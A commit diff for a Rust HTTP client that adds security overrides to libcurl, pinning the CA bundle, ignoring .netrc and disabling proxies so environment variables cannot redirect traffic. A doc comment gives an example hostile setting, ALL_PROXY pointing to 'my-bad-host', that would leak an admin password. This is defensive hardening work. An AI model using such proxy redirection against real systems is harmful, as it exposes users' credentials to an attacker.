security: override CURL env parameters
This commit is contained in:
@@ -49,6 +49,21 @@ pub struct Response {
|
||||
}
|
||||
|
||||
impl Client {
|
||||
/// Adds defalt options that can be env overriden in untrsuted environments to leak information.
|
||||
///
|
||||
/// E.g. `ALL_PROXY=http://my-bad-host/ passwd` leaks admins password without this.
|
||||
///
|
||||
/// Check:
|
||||
/// - <https://curl.se/libcurl/c/libcurl-env.html>
|
||||
pub fn add_security_overrides(easy: &mut Easy) -> Result<(), curl::Error> {
|
||||
easy.cainfo("/etc/ssl/certs/ca-bundle.crt")?;
|
||||
easy.netrc(curl::easy::NetRc::Ignored)?;
|
||||
// <https://docs.rs/curl/latest/curl/easy/struct.Easy2.html#method.noproxy>
|
||||
easy.noproxy("*")?;
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub fn add_headers(easy: &mut Easy, headers: &[&str]) -> Result<(), curl::Error> {
|
||||
let mut curl_headers = List::new();
|
||||
|
||||
@@ -121,6 +136,7 @@ impl Client {
|
||||
let mut easy = Easy::new();
|
||||
let client = &mut easy;
|
||||
|
||||
Self::add_security_overrides(client)?;
|
||||
Self::add_headers(client, headers)?;
|
||||
client.url(uri)?;
|
||||
Self::set_method_and_body(client, method)?;
|
||||
|
||||
Reference in New Issue
Block a user